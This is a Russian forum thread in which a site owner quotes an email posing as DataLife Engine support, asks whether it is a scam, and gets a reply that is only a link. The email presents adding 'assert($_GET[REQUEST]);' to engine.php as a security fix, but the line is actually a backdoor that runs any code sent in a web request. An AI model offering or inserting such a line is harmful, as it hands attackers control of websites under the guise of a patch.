lors 0 Опубликовано: 25 октября 2014 Рассказать Опубликовано: 25 октября 2014 Здравствуйте, сегодня получил вот такое письмо: Благодарим Вас за использование на Вашем сайте нашего ПО «CMS DataLife Engine - Система управления сайтами». Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных. По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников. Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: /engine/engine.php и в самое начало файла после строчки: <?php добавьте: assert($_GET[REQUEST]); С уважением, Служба поддержки «DataLife Engine» IP адрес отправителя: 46.38.63.68 Помните, что администрация сайта не несет ответственности за содержание данного письма Подозреваю на 80%, что скорее всего это махинации злоумышленников, которые через действия некомпетентных веб-мастеров (подобных мне) пытаются сделать их сайты еще более уязвимыми. Так все-таки, это развод или правда? Нужно ли следовать инструкции в этом письме, оно действительно от разработчиков? Цитата Ссылка на сообщение Поделиться на других сайтах
marsic 0 Опубликовано: 25 октября 2014 Рассказать Опубликовано: 25 октября 2014 http://forum.dle-news.ru/index.php?showtopic=66893 Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.